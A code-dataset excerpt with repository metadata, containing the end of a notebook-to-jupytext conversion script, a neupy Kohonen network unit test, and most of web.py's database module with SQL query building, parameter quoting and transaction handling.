for index, item in enumerate(orig_nb.cells):
print(f"at cell {index}")
item["metadata"]["cell_count"] = index
if item["cell_type"] == "markdown":
text = item["source"]
if text.find("pic") > -1:
print(f"found img for: {text[:20]}")
out = split_cell_re.match(text)
if out:
print(f"length of split is {len(out.groups())}")
print(f"splitting cell at index {index}")
cell_dict = dict()
for name in ["front", "back"]:
src = out.group(name)
if len(src) > 0:
cell_dict[name] = new_markdown_cell(source=src)
src = out.group("img")
match = image_re.match(src)
if match:
text = match.group(1)
soup = BeautifulSoup(text, "html.parser")
out = soup()
py_image = py_template.format_map(out[0].attrs)
cell_dict["img"] = new_code_cell(source=py_image)
count = 0
for key in ["front", "img", "back"]:
try:
if key == "front":
new_nb_cells[index] = cell_dict[key]
else:
new_nb_cells.insert(index + count, cell_dict[key])
count += 1
except KeyError:
pass
else:
item["metadata"]["cell_count"] = index
if item["source"].find("IPython.display") > -1:
need_display_import = False
print(f"found python cell: {item['source']}")
if need_display_import:
top_cell = new_code_cell(source="from IPython.display import Image")
new_nb_cells.insert(1, top_cell)
orig_nb.cells = new_nb_cells
# https://nbconvert.readthedocs.io/en/latest/execute_api.html
print(f"running notebook in folder {nb_outfile.parent}")
ep = ExecutePreprocessor(timeout=600, kernel_name="python3", allow_errors=True)
path = str(nb_outfile.parent)
path_dict = dict({"metadata": {"path": path}})
try:
out = ep.preprocess(orig_nb, path_dict)
except CellExecutionError:
out = None
msg = f"Error executing the notebook {nb_outfile.name}.\n\n"
msg += f"See notebook {nb_outfile.name} for the traceback."
print(msg)
raise
finally:
if "toc" not in orig_nb["metadata"]:
orig_nb["metadata"].update(toc_meta)
pdb.set_trace()
rearrange_jupytext_metadata(orig_nb["metadata"])
out = writes(orig_nb, "py", nbformat.NO_CONVERT)
pdb.set_trace()
with open(nb_outfile, mode="wt") as f:
nbformat.write(orig_nb, f)
jupytext.writef(orig_nb, py_outfile, fmt="py")
print(f"wrote {nb_outfile} and \n {py_outfile}")
if __name__ == "__main__":
#
# will exit with non-zero return value if exceptions occur
#
# args = ['vancouver_hires.h5']
sys.exit(main())
| [
"paustin@eos.ubc.ca"
] | paustin@eos.ubc.ca |
2ebe41aa7b83bf751f563796d36307ca3e0d94da | 8e6546515c8094f2df7fca4be343b57a1716257a | /tests/algorithms/associative/test_kohonen.py | d8a23d2f1bcfb9f72d8e7f49994c478d12883f70 | [
"MIT"
] | permissive | FGDBTKD/neupy | b51e5870ef75df8aa3dcfb6753648a235f39e50b | 1f5e1ae9364e8c7816df79678a4648c689d2a5d1 | refs/heads/master | 2020-03-31T13:32:57.099935 | 2018-10-29T15:52:19 | 2018-10-29T15:52:19 | 152,260,277 | 0 | 0 | MIT | 2018-10-29T15:52:20 | 2018-10-09T13:56:16 | Python | UTF-8 | Python | false | false | 1,731 | py | import numpy as np
from neupy import algorithms
from base import BaseTestCase
input_data = np.array([
[0.1961, 0.9806],
[-0.1961, 0.9806],
[0.9806, 0.1961],
[0.9806, -0.1961],
[-0.5812, -0.8137],
[-0.8137, -0.5812],
])
class KohonenTestCase(BaseTestCase):
def test_kohonen_success(self):
kh = algorithms.Kohonen(
n_inputs=2,
n_outputs=3,
weight=np.array([
[0.7071, 0.7071, -1.0000],
[-0.7071, 0.7071, 0.0000],
]),
step=0.5,
verbose=False,
)
# test one iteration update
data = np.reshape(input_data[0, :], (1, input_data.shape[1]))
kh.train(data, epochs=1)
np.testing.assert_array_almost_equal(
kh.weight,
np.array([
[0.7071, 0.4516, -1.0000],
[-0.7071, 0.84385, 0.0000],
]),
decimal=4
)
def test_train_different_inputs(self):
self.assertInvalidVectorTrain(
algorithms.Kohonen(
n_inputs=1,
n_outputs=2,
step=0.5,
verbose=False
),
np.array([1, 2, 3])
)
def test_predict_different_inputs(self):
knet = algorithms.Kohonen(
n_inputs=1,
n_outputs=2,
step=0.5,
verbose=False,
)
data = np.array([[1, 1, 1]]).T
target = np.array([
[1, 0],
[1, 0],
[1, 0],
])
knet.train(data, epochs=100)
self.assertInvalidVectorPred(knet, data.ravel(), target,
decimal=2)
| [
"mail@itdxer.com"
] | mail@itdxer.com |
cd680ed3da608dd25b4d2a60a4c8907d52b8dba8 | 3fdaa54102e0be999e3fc664a917ea0a7a603675 | /cloudprint/Lib/site-packages/web.py-0.40.dev0-py3.5.egg/web/db.py | a8eb75f5b2dc6d4ec7403c2f4c04c59e95ae1321 | [
"MIT"
] | permissive | William-An/CloudPrint | ba8033175a11e25a2c68ccf7b8a3387e78ac1719 | 952f25341ea0423b83ee2ded1927ba0cf160a095 | refs/heads/master | 2022-11-04T13:58:27.715234 | 2017-04-17T05:33:25 | 2017-04-17T05:33:25 | 88,139,548 | 9 | 3 | MIT | 2022-10-20T01:19:11 | 2017-04-13T07:53:55 | Python | UTF-8 | Python | false | false | 43,930 | py | """
Database API
(part of web.py)
"""
from __future__ import print_function
from .utils import threadeddict, storage, iters, iterbetter, safestr, safeunicode
import datetime, time, os, urllib, re
from .py3helpers import PY2, string_types, numeric_types, iteritems
try:
from urllib import parse as urlparse
from urllib.parse import unquote
except ImportError:
import urlparse
from urllib import unquote
try:
# db module can work independent of web.py
from .webapi import debug, config
except:
import sys
debug = sys.stderr
config = storage()
# Public names exported by this module.
__all__ = [
  "UnknownParamstyle", "UnknownDB", "TransactionError",
  "sqllist", "sqlors", "reparam", "sqlquote",
  "SQLQuery", "SQLParam", "sqlparam",
  "SQLLiteral", "sqlliteral",
  "database", 'DB',
]

# Regex matching one Python token (numbers, operators, string literals,
# identifiers, comments, line continuations).  Used by the interpolation
# machinery (see `reparam`/`_interpolate`) to find the end of a `$expr`
# embedded in a SQL string.  Copied from the old `tokenize` module's pattern.
TOKEN = '[ \\f\\t]*(\\\\\\r?\\n[ \\f\\t]*)*(#[^\\r\\n]*)?(((\\d+[jJ]|((\\d+\\.\\d*|\\.\\d+)([eE][-+]?\\d+)?|\\d+[eE][-+]?\\d+)[jJ])|((\\d+\\.\\d*|\\.\\d+)([eE][-+]?\\d+)?|\\d+[eE][-+]?\\d+)|(0[xX][\\da-fA-F]+[lL]?|0[bB][01]+[lL]?|(0[oO][0-7]+)|(0[0-7]*)[lL]?|[1-9]\\d*[lL]?))|((\\*\\*=?|>>=?|<<=?|<>|!=|//=?|[+\\-*/%&|^=<>]=?|~)|[][(){}]|(\\r?\\n|[:;.,`@]))|([uUbB]?[rR]?\'[^\\n\'\\\\]*(?:\\\\.[^\\n\'\\\\]*)*\'|[uUbB]?[rR]?"[^\\n"\\\\]*(?:\\\\.[^\\n"\\\\]*)*")|[a-zA-Z_]\\w*)'
# Pre-compiled once at import time; matched repeatedly during interpolation.
tokenprog = re.compile(TOKEN)
class UnknownDB(Exception):
    """Raised when an unsupported database engine is requested."""
    pass
class _ItplError(ValueError):
def __init__(self, text, pos):
ValueError.__init__(self)
self.text = text
self.pos = pos
def __str__(self):
return "unfinished expression in %s at char %d" % (
repr(self.text), self.pos)
class TransactionError(Exception): pass
class UnknownParamstyle(Exception):
    """Raised when an unsupported DB-API paramstyle is encountered.

    Currently supported styles: qmark, numeric, format, pyformat.
    """
    pass
class SQLParam(object):
    """
    A single bound parameter inside a SQLQuery.

    >>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam("joe")])
    >>> q
    <sql: "SELECT * FROM test WHERE name='joe'">
    >>> q.query()
    'SELECT * FROM test WHERE name=%s'
    >>> q.values()
    ['joe']
    """
    __slots__ = ["value"]

    def __init__(self, value):
        self.value = value

    def get_marker(self, paramstyle='pyformat'):
        """Return the DB-API placeholder text for the given paramstyle."""
        if paramstyle == 'qmark':
            return '?'
        if paramstyle == 'numeric':
            return ':1'
        if paramstyle in (None, 'format', 'pyformat'):
            return '%s'
        raise UnknownParamstyle(paramstyle)

    def sqlquery(self):
        """Wrap this parameter in a one-item SQLQuery."""
        return SQLQuery([self])

    def __add__(self, other):
        return self.sqlquery() + other

    def __radd__(self, other):
        return other + self.sqlquery()

    def __str__(self):
        return str(self.value)

    def __repr__(self):
        return '<param: %s>' % repr(self.value)

# Lowercase alias kept for backward compatibility.
sqlparam = SQLParam
class SQLQuery(object):
    """
    You can pass this sort of thing as a clause in any db function.
    Otherwise, you can pass a dictionary to the keyword argument `vars`
    and the function will call reparam for you.
    Internally, consists of `items`, which is a list of strings and
    SQLParams, which get concatenated to produce the actual query.
    """
    __slots__ = ["items"]
    # tested in sqlquote's docstring
    def __init__(self, items=None):
        r"""Creates a new SQLQuery.
        >>> SQLQuery("x")
        <sql: 'x'>
        >>> q = SQLQuery(['SELECT * FROM ', 'test', ' WHERE x=', SQLParam(1)])
        >>> q
        <sql: 'SELECT * FROM test WHERE x=1'>
        >>> q.query(), q.values()
        ('SELECT * FROM test WHERE x=%s', [1])
        >>> SQLQuery(SQLParam(1))
        <sql: '1'>
        """
        # Accept None, a list (used as-is, not copied), a single SQLParam,
        # another SQLQuery (items copied), or any other object as one item.
        if items is None:
            self.items = []
        elif isinstance(items, list):
            self.items = items
        elif isinstance(items, SQLParam):
            self.items = [items]
        elif isinstance(items, SQLQuery):
            self.items = list(items.items)
        else:
            self.items = [items]
        # Take care of SQLLiterals: unwrap them so they end up in the raw
        # query text rather than being bound as parameters.
        for i, item in enumerate(self.items):
            if isinstance(item, SQLParam) and isinstance(item.value, SQLLiteral):
                self.items[i] = item.value.v
    def append(self, value):
        # Append a raw item (string or SQLParam) without any processing.
        self.items.append(value)
    def __add__(self, other):
        # query + str or query + query; anything else is unsupported.
        if isinstance(other, string_types):
            items = [other]
        elif isinstance(other, SQLQuery):
            items = other.items
        else:
            return NotImplemented
        return SQLQuery(self.items + items)
    def __radd__(self, other):
        # str + query.
        if isinstance(other, string_types):
            items = [other]
        else:
            return NotImplemented
        return SQLQuery(items + self.items)
    def __iadd__(self, other):
        # In-place concatenation mutates self.items.
        if isinstance(other, (string_types, SQLParam)):
            self.items.append(other)
        elif isinstance(other, SQLQuery):
            self.items.extend(other.items)
        else:
            return NotImplemented
        return self
    def __len__(self):
        # Length of the rendered query string (placeholders, not values).
        return len(self.query())
    def query(self, paramstyle=None):
        """
        Returns the query part of the sql query.
        >>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
        >>> q.query()
        'SELECT * FROM test WHERE name=%s'
        >>> q.query(paramstyle='qmark')
        'SELECT * FROM test WHERE name=?'
        """
        s = []
        for x in self.items:
            if isinstance(x, SQLParam):
                x = x.get_marker(paramstyle)
                s.append(safestr(x))
            else:
                x = safestr(x)
                # automatically escape % characters in the query
                # For backward compatibility, ignore escaping when the query looks already escaped
                if paramstyle in ['format', 'pyformat']:
                    if '%' in x and '%%' not in x:
                        x = x.replace('%', '%%')
                s.append(x)
        return "".join(s)
    def values(self):
        """
        Returns the values of the parameters used in the sql query.
        >>> q = SQLQuery(["SELECT * FROM test WHERE name=", SQLParam('joe')])
        >>> q.values()
        ['joe']
        """
        return [i.value for i in self.items if isinstance(i, SQLParam)]
    def join(items, sep=' ', prefix=None, suffix=None, target=None):
        """
        Joins multiple queries.
        >>> SQLQuery.join(['a', 'b'], ', ')
        <sql: 'a, b'>
        Optionally, prefix and suffix arguments can be provided.
        >>> SQLQuery.join(['a', 'b'], ', ', prefix='(', suffix=')')
        <sql: '(a, b)'>
        If target argument is provided, the items are appended to target instead of creating a new SQLQuery.
        """
        if target is None:
            target = SQLQuery()
        target_items = target.items
        if prefix:
            target_items.append(prefix)
        for i, item in enumerate(items):
            if i != 0:
                target_items.append(sep)
            if isinstance(item, SQLQuery):
                # Splice nested queries flat so parameters are preserved.
                target_items.extend(item.items)
            else:
                target_items.append(item)
        if suffix:
            target_items.append(suffix)
        return target
    # Defined as a plain function above, then converted; lets it be called
    # both as SQLQuery.join(...) and on instances.
    join = staticmethod(join)
    def _str(self):
        # Best-effort rendering with values substituted in; falls back to
        # the raw placeholder form if %-formatting fails.
        try:
            return self.query() % tuple([sqlify(x) for x in self.values()])
        except (ValueError, TypeError):
            return self.query()
    def __str__(self):
        return safestr(self._str())
    def __unicode__(self):
        # Py2-only hook; ignored by Py3.
        return safeunicode(self._str())
    def __repr__(self):
        return '<sql: %s>' % repr(str(self))
class SQLLiteral:
    """
    Wraps a string so `sqlquote` leaves it unquoted in the query text.

    >>> sqlquote('NOW()')
    <sql: "'NOW()'">
    >>> sqlquote(SQLLiteral('NOW()'))
    <sql: 'NOW()'>
    """
    def __init__(self, v):
        self.v = v

    def __repr__(self):
        return self.v

# Lowercase alias kept for backward compatibility.
sqlliteral = SQLLiteral
def _sqllist(values):
    """
    Build a parenthesized, comma-separated SQLQuery of bound parameters.

    >>> _sqllist([1, 2, 3])
    <sql: '(1, 2, 3)'>
    """
    parts = ['(']
    for v in values:
        parts.append(sqlparam(v))
        parts.append(', ')
    if len(parts) > 1:
        parts.pop()  # drop the trailing separator
    parts.append(')')
    return SQLQuery(parts)
def reparam(string_, dictionary):
    """
    Interpolate `$expr` placeholders in *string_* with values looked up in
    *dictionary*, returning an `SQLQuery` with the values safely bound.

    >>> reparam("s = $s", dict(s=True))
    <sql: "s = 't'">
    >>> reparam("s IN $s", dict(s=[1, 2]))
    <sql: 's IN (1, 2)'>
    """
    env = dictionary.copy()  # eval mucks with it
    # Disable builtins to reduce the risk of remote code execution via eval.
    env['__builtins__'] = object()
    pieces = []
    for live, chunk in _interpolate(string_):
        if live:
            # `chunk` is a Python expression extracted from `$...`.
            pieces.append(sqlquote(eval(chunk, env)))
        else:
            pieces.append(chunk)
    return SQLQuery.join(pieces, '')
def sqlify(obj):
    """
    Convert `obj` to its literal SQL representation.

    >>> sqlify(None)
    'NULL'
    >>> sqlify(True)
    "'t'"
    >>> sqlify(3)
    '3'
    """
    # Identity checks must come before the numeric isinstance check:
    # `1 == True and hash(1) == hash(True)`, so booleans would otherwise
    # be swallowed by the numeric branch.
    if obj is None:
        return 'NULL'
    if obj is True:
        return "'t'"
    if obj is False:
        return "'f'"
    if isinstance(obj, numeric_types):
        return str(obj)
    if isinstance(obj, datetime.datetime):
        return repr(obj.isoformat())
    # Strings are always UTF8 in Py3; short-circuit keeps `unicode`
    # from being evaluated (it is undefined) on Python 3.
    if PY2 and isinstance(obj, unicode):
        obj = obj.encode('utf8')
    return repr(obj)
def sqllist(lst):
    """
    Render a table-name argument for use in a FROM clause: a plain string
    passes through unchanged, any other iterable is comma-joined.

    >>> sqllist(['a', 'b'])
    'a, b'
    >>> sqllist('a')
    'a'
    """
    if isinstance(lst, string_types):
        return lst
    return ', '.join(lst)
def sqlors(left, lst):
    """
    `left` is a SQL fragment like `tablename.arg = ` and `lst` is a value or
    a list of values.  Returns an SQLQuery that ORs the fragment over every
    item of `lst`.

    >>> sqlors('foo = ', [])
    <sql: '1=2'>
    >>> sqlors('foo = ', [1])
    <sql: 'foo = 1'>
    >>> sqlors('foo = ', 1)
    <sql: 'foo = 1'>
    >>> sqlors('foo = ', [1,2,3])
    <sql: '(foo = 1 OR foo = 2 OR foo = 3 OR 1=2)'>
    """
    if isinstance(lst, iters):
        lst = list(lst)
        if not lst:
            # An empty list can never match; "1=2" is always false.
            return SQLQuery("1=2")
        if len(lst) == 1:
            # Unwrap a single element and fall through to the scalar case.
            lst = lst[0]
    if isinstance(lst, iters):
        pieces = ['(']
        for item in lst:
            pieces.extend([left, sqlparam(item), ' OR '])
        pieces.append('1=2)')
        return SQLQuery(pieces)
    return left + sqlparam(lst)
def sqlwhere(data, grouping=' AND '):
    """
    Convert an iterable of (key, value) pairs into a WHERE-clause `SQLQuery`,
    joining the equality tests with *grouping*.

    >>> sqlwhere((('cust_id', 2), ('order_id',3)))
    <sql: 'cust_id = 2 AND order_id = 3'>
    >>> sqlwhere((('order_id', 3), ('cust_id', 2)), grouping=', ')
    <sql: 'order_id = 3, cust_id = 2'>
    >>> sqlwhere((('a', 'a'), ('b', 'b'))).query()
    'a = %s AND b = %s'
    """
    clauses = []
    for key, value in data:
        clauses.append(key + ' = ' + sqlparam(value))
    return SQLQuery.join(clauses, grouping)
def sqlquote(a):
    """
    Quote `a` for safe inclusion in a SQL query; lists become IN-style tuples.

    >>> 'WHERE x = ' + sqlquote(True) + ' AND y = ' + sqlquote(3)
    <sql: "WHERE x = 't' AND y = 3">
    >>> 'WHERE x = ' + sqlquote(True) + ' AND y IN ' + sqlquote([2, 3])
    <sql: "WHERE x = 't' AND y IN (2, 3)">
    """
    if isinstance(a, list):
        return _sqllist(a)
    return sqlparam(a).sqlquery()
class Transaction:
    """Database transaction.

    Works as a context manager: commits on clean exit, rolls back on an
    exception.  Nested transactions are emulated with SQL SAVEPOINTs.
    """
    def __init__(self, ctx):
        self.ctx = ctx
        # Depth of the transaction stack at entry; savepoint names and the
        # engine choice below both key off this value.
        self.transaction_count = transaction_count = len(ctx.transactions)
        class transaction_engine:
            """Transaction Engine used in top level transactions."""
            def do_transact(self):
                # Flush any pending work but keep the pooled connection.
                ctx.commit(unload=False)
            def do_commit(self):
                ctx.commit()
            def do_rollback(self):
                ctx.rollback()
        class subtransaction_engine:
            """Transaction Engine used in sub transactions."""
            def query(self, q):
                # %s is filled with the nesting depth, giving each savepoint
                # a unique name (webpy_sp_0, webpy_sp_1, ...).
                db_cursor = ctx.db.cursor()
                ctx.db_execute(db_cursor, SQLQuery(q % transaction_count))
            def do_transact(self):
                self.query('SAVEPOINT webpy_sp_%s')
            def do_commit(self):
                self.query('RELEASE SAVEPOINT webpy_sp_%s')
            def do_rollback(self):
                self.query('ROLLBACK TO SAVEPOINT webpy_sp_%s')
        class dummy_engine:
            """Transaction Engine used instead of subtransaction_engine
            when sub transactions are not supported."""
            do_transact = do_commit = do_rollback = lambda self: None
        if self.transaction_count:
            # nested transactions are not supported in some databases
            if self.ctx.get('ignore_nested_transactions'):
                self.engine = dummy_engine()
            else:
                self.engine = subtransaction_engine()
        else:
            self.engine = transaction_engine()
        self.engine.do_transact()
        self.ctx.transactions.append(self)
    def __enter__(self):
        return self
    def __exit__(self, exctype, excvalue, traceback):
        # Roll back on error, commit otherwise; the exception propagates.
        if exctype is not None:
            self.rollback()
        else:
            self.commit()
    def commit(self):
        # Only act if this transaction is still open (guards against a
        # second commit/rollback after the stack was already unwound).
        if len(self.ctx.transactions) > self.transaction_count:
            self.engine.do_commit()
            self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
    def rollback(self):
        if len(self.ctx.transactions) > self.transaction_count:
            self.engine.do_rollback()
            self.ctx.transactions = self.ctx.transactions[:self.transaction_count]
class DB:
    """Database

    Base class wrapping a DB-API 2.0 driver module.  Connections are stored
    per-thread in a `threadeddict` context and optionally pooled via DBUtils.
    """
    def __init__(self, db_module, keywords):
        """Creates a database.

        `db_module` is the DB-API driver module; `keywords` are passed on to
        its connect() function (after web.py-specific keys are popped off).
        """
        # some DB implementations take an optional parameter `driver` to use
        # a specific driver module, but it should not be passed to connect
        keywords.pop('driver', None)
        self.db_module = db_module
        self.keywords = keywords
        # Per-thread context holding the connection, query count and
        # transaction stack.
        self._ctx = threadeddict()
        # flag to enable/disable printing queries
        self.printing = config.get('debug_sql', config.get('debug', False))
        self.supports_multiple_insert = False
        try:
            import DBUtils
            # enable pooling if DBUtils module is available.
            self.has_pooling = True
        except ImportError:
            self.has_pooling = False
        # Pooling can be disabled by passing pooling=False in the keywords.
        self.has_pooling = self.keywords.pop('pooling', True) and self.has_pooling
    def _getctx(self):
        # Lazily connect the first time the context is touched in a thread.
        if not self._ctx.get('db'):
            self._load_context(self._ctx)
        return self._ctx
    ctx = property(_getctx)
    def _load_context(self, ctx):
        # Initialize the per-thread context: connection, counters, and
        # commit/rollback wrappers that release pooled connections.
        ctx.dbq_count = 0
        ctx.transactions = [] # stack of transactions
        if self.has_pooling:
            ctx.db = self._connect_with_pooling(self.keywords)
        else:
            ctx.db = self._connect(self.keywords)
        ctx.db_execute = self._db_execute
        # Some drivers lack commit/rollback; install no-ops so callers
        # can invoke them unconditionally.
        if not hasattr(ctx.db, 'commit'):
            ctx.db.commit = lambda: None
        if not hasattr(ctx.db, 'rollback'):
            ctx.db.rollback = lambda: None
        def commit(unload=True):
            # do db commit and release the connection if pooling is enabled.
            ctx.db.commit()
            if unload and self.has_pooling:
                self._unload_context(self._ctx)
        def rollback():
            # do db rollback and release the connection if pooling is enabled.
            ctx.db.rollback()
            if self.has_pooling:
                self._unload_context(self._ctx)
        ctx.commit = commit
        ctx.rollback = rollback
    def _unload_context(self, ctx):
        # Drop the connection; next access reconnects via _load_context.
        del ctx.db
    def _connect(self, keywords):
        # Plain (non-pooled) connection through the driver module.
        return self.db_module.connect(**keywords)
    def _connect_with_pooling(self, keywords):
        def get_pooled_db():
            from DBUtils import PooledDB
            # In DBUtils 0.9.3, `dbapi` argument is renamed as `creator`
            # see Bug#122112
            # NOTE(review): this compares lists of version *strings*
            # lexicographically (e.g. '10' < '9') — confirm intended.
            if PooledDB.__version__.split('.') < '0.9.3'.split('.'):
                return PooledDB.PooledDB(dbapi=self.db_module, **keywords)
            else:
                return PooledDB.PooledDB(creator=self.db_module, **keywords)
        # The pool itself is created once per DB instance and reused.
        if getattr(self, '_pooleddb', None) is None:
            self._pooleddb = get_pooled_db()
        return self._pooleddb.connection()
    def _db_cursor(self):
        # Fresh cursor on the per-thread connection.
        return self.ctx.db.cursor()
    def _param_marker(self):
        """Returns parameter marker based on paramstyle attribute of this database."""
        style = getattr(self, 'paramstyle', 'pyformat')
        if style == 'qmark':
            return '?'
        elif style == 'numeric':
            return ':1'
        elif style in ['format', 'pyformat']:
            return '%s'
        raise UnknownParamstyle(style)
    def _db_execute(self, cur, sql_query):
        """executes an sql query"""
        self.ctx.dbq_count += 1
        try:
            a = time.time()
            query, params = self._process_query(sql_query)
            out = cur.execute(query, params)
            b = time.time()
        # NOTE(review): bare except also catches KeyboardInterrupt and
        # SystemExit; error is logged, rolled back, then re-raised.
        except:
            if self.printing:
                print('ERR:', str(sql_query), file=debug)
            if self.ctx.transactions:
                self.ctx.transactions[-1].rollback()
            else:
                self.ctx.rollback()
            raise
        if self.printing:
            # Elapsed seconds, running query count, and the rendered query.
            print('%s (%s): %s' % (round(b-a, 2), self.ctx.dbq_count, str(sql_query)), file=debug)
        return out
    def _process_query(self, sql_query):
        """Takes the SQLQuery object and returns query string and parameters.
        """
        paramstyle = getattr(self, 'paramstyle', 'pyformat')
        query = sql_query.query(paramstyle)
        params = sql_query.values()
        return query, params
    def _where(self, where, vars):
        # Normalize the various accepted `where` forms into an SQLQuery.
        if isinstance(where, numeric_types):
            # A bare number is treated as a primary-key lookup.
            where = "id = " + sqlparam(where)
        #@@@ for backward-compatibility
        elif isinstance(where, (list, tuple)) and len(where) == 2:
            where = SQLQuery(where[0], where[1])
        elif isinstance(where, dict):
            where = self._where_dict(where)
        elif isinstance(where, SQLQuery):
            pass
        else:
            where = reparam(where, vars)
        return where
    def _where_dict(self, where):
        # Build "k = v AND ..." from a dict; keys sorted for determinism.
        where_clauses = []
        for k, v in sorted(iteritems(where), key= lambda t:t[0]):
            where_clauses.append(k + ' = ' + sqlquote(v))
        if where_clauses:
            return SQLQuery.join(where_clauses, " AND ")
        else:
            return None
    def query(self, sql_query, vars=None, processed=False, _test=False):
        """
        Execute SQL query `sql_query` using dictionary `vars` to interpolate it.
        If `processed=True`, `vars` is a `reparam`-style list to use
        instead of interpolating.

        >>> db = DB(None, {})
        >>> db.query("SELECT * FROM foo", _test=True)
        <sql: 'SELECT * FROM foo'>
        >>> db.query("SELECT * FROM foo WHERE x = $x", vars=dict(x='f'), _test=True)
        <sql: "SELECT * FROM foo WHERE x = 'f'">
        >>> db.query("SELECT * FROM foo WHERE x = " + sqlquote('f'), _test=True)
        <sql: "SELECT * FROM foo WHERE x = 'f'">
        """
        if vars is None: vars = {}
        if not processed and not isinstance(sql_query, SQLQuery):
            sql_query = reparam(sql_query, vars)
        if _test: return sql_query
        db_cursor = self._db_cursor()
        self._db_execute(db_cursor, sql_query)
        if db_cursor.description:
            # A result set: wrap rows as Storage objects, lazily fetched.
            names = [x[0] for x in db_cursor.description]
            def iterwrapper():
                row = db_cursor.fetchone()
                while row:
                    yield storage(dict(zip(names, row)))
                    row = db_cursor.fetchone()
            out = iterbetter(iterwrapper())
            out.__len__ = lambda: int(db_cursor.rowcount)
            out.list = lambda: [storage(dict(zip(names, x))) \
                               for x in db_cursor.fetchall()]
        else:
            # No result set (e.g. UPDATE/DELETE): return affected row count.
            out = db_cursor.rowcount
        if not self.ctx.transactions:
            self.ctx.commit()
        return out
    def select(self, tables, vars=None, what='*', where=None, order=None, group=None,
               limit=None, offset=None, _test=False):
        """
        Selects `what` from `tables` with clauses `where`, `order`,
        `group`, `limit`, and `offset`. Uses vars to interpolate.
        Otherwise, each clause can be a SQLQuery.

        >>> db = DB(None, {})
        >>> db.select('foo', _test=True)
        <sql: 'SELECT * FROM foo'>
        >>> db.select(['foo', 'bar'], where="foo.bar_id = bar.id", limit=5, _test=True)
        <sql: 'SELECT * FROM foo, bar WHERE foo.bar_id = bar.id LIMIT 5'>
        >>> db.select('foo', where={'id': 5}, _test=True)
        <sql: 'SELECT * FROM foo WHERE id = 5'>
        """
        if vars is None: vars = {}
        sql_clauses = self.sql_clauses(what, tables, where, group, order, limit, offset)
        # Clauses whose value is None are dropped entirely.
        clauses = [self.gen_clause(sql, val, vars) for sql, val in sql_clauses if val is not None]
        qout = SQLQuery.join(clauses)
        if _test: return qout
        return self.query(qout, processed=True)
    def where(self, table, what='*', order=None, group=None, limit=None,
              offset=None, _test=False, **kwargs):
        """
        Selects from `table` where keys are equal to values in `kwargs`.

        >>> db = DB(None, {})
        >>> db.where('foo', bar_id=3, _test=True)
        <sql: 'SELECT * FROM foo WHERE bar_id = 3'>
        >>> db.where('foo', source=2, crust='dewey', _test=True)
        <sql: "SELECT * FROM foo WHERE crust = 'dewey' AND source = 2">
        >>> db.where('foo', _test=True)
        <sql: 'SELECT * FROM foo'>
        """
        where = self._where_dict(kwargs)
        return self.select(table, what=what, order=order,
                group=group, limit=limit, offset=offset, _test=_test,
                where=where)
    def sql_clauses(self, what, tables, where, group, order, limit, offset):
        # Fixed clause ordering for SELECT statement assembly.
        return (
            ('SELECT', what),
            ('FROM', sqllist(tables)),
            ('WHERE', where),
            ('GROUP BY', group),
            ('ORDER BY', order),
            ('LIMIT', limit),
            ('OFFSET', offset))
    def gen_clause(self, sql, val, vars):
        # Render one "<KEYWORD> <value>" fragment; `val` may be a number,
        # a 2-tuple (legacy), a dict (WHERE only), an SQLQuery or a string.
        if isinstance(val, numeric_types):
            if sql == 'WHERE':
                nout = 'id = ' + sqlquote(val)
            else:
                nout = SQLQuery(val)
        #@@@
        elif isinstance(val, (list, tuple)) and len(val) == 2:
            nout = SQLQuery(val[0], val[1]) # backwards-compatibility
        elif sql == 'WHERE' and isinstance(val, dict):
            nout = self._where_dict(val)
        elif isinstance(val, SQLQuery):
            nout = val
        else:
            nout = reparam(val, vars)
        def xjoin(a, b):
            if a and b: return a + ' ' + b
            else: return a or b
        return xjoin(sql, nout)
    def insert(self, tablename, seqname=None, _test=False, **values):
        """
        Inserts `values` into `tablename`. Returns current sequence ID.
        Set `seqname` to the ID if it's not the default, or to `False`
        if there isn't one.

        >>> db = DB(None, {})
        >>> q = db.insert('foo', name='bob', age=2, created=SQLLiteral('NOW()'), _test=True)
        >>> q
        <sql: "INSERT INTO foo (age, created, name) VALUES (2, NOW(), 'bob')">
        >>> q.query()
        'INSERT INTO foo (age, created, name) VALUES (%s, NOW(), %s)'
        >>> q.values()
        [2, 'bob']
        """
        def q(x): return "(" + x + ")"
        if values:
            #needed for Py3 compatibility with the above doctests
            sorted_values = sorted(values.items(), key=lambda t: t[0])
            _keys = SQLQuery.join(map(lambda t: t[0], sorted_values), ', ')
            _values = SQLQuery.join([sqlparam(v) for v in map(lambda t: t[1], sorted_values)], ', ')
            sql_query = "INSERT INTO %s " % tablename + q(_keys) + ' VALUES ' + q(_values)
        else:
            sql_query = SQLQuery(self._get_insert_default_values_query(tablename))
        if _test: return sql_query
        db_cursor = self._db_cursor()
        if seqname is not False:
            sql_query = self._process_insert_query(sql_query, tablename, seqname)
        if isinstance(sql_query, tuple):
            # for some databases, a separate query has to be made to find
            # the id of the inserted row.
            q1, q2 = sql_query
            self._db_execute(db_cursor, q1)
            self._db_execute(db_cursor, q2)
        else:
            self._db_execute(db_cursor, sql_query)
        try:
            out = db_cursor.fetchone()[0]
        except Exception:
            # No id available (e.g. seqname=False or driver quirk).
            out = None
        if not self.ctx.transactions:
            self.ctx.commit()
        return out
    def _get_insert_default_values_query(self, table):
        # Overridden per-backend where this syntax differs (see MySQLDB).
        return "INSERT INTO %s DEFAULT VALUES" % table
    def multiple_insert(self, tablename, values, seqname=None, _test=False):
        """
        Inserts multiple rows into `tablename`. The `values` must be a list of dictionaries,
        one for each row to be inserted, each with the same set of keys.
        Returns the list of ids of the inserted rows.
        Set `seqname` to the ID if it's not the default, or to `False`
        if there isn't one.

        >>> db = DB(None, {})
        >>> db.supports_multiple_insert = True
        >>> values = [{"name": "foo", "email": "foo@example.com"}, {"name": "bar", "email": "bar@example.com"}]
        >>> db.multiple_insert('person', values=values, _test=True)
        <sql: "INSERT INTO person (email, name) VALUES ('foo@example.com', 'foo'), ('bar@example.com', 'bar')">
        """
        if not values:
            return []
        if not self.supports_multiple_insert:
            # Fall back to one INSERT per row.
            out = [self.insert(tablename, seqname=seqname, _test=_test, **v) for v in values]
            if seqname is False:
                return None
            else:
                return out
        keys = values[0].keys()
        #@@ make sure all keys are valid
        for v in values:
            if v.keys() != keys:
                raise ValueError('Not all rows have the same keys')
        keys = sorted(keys) #enforce query order for the above doctest compatibility with Py3
        sql_query = SQLQuery('INSERT INTO %s (%s) VALUES ' % (tablename, ', '.join(keys)))
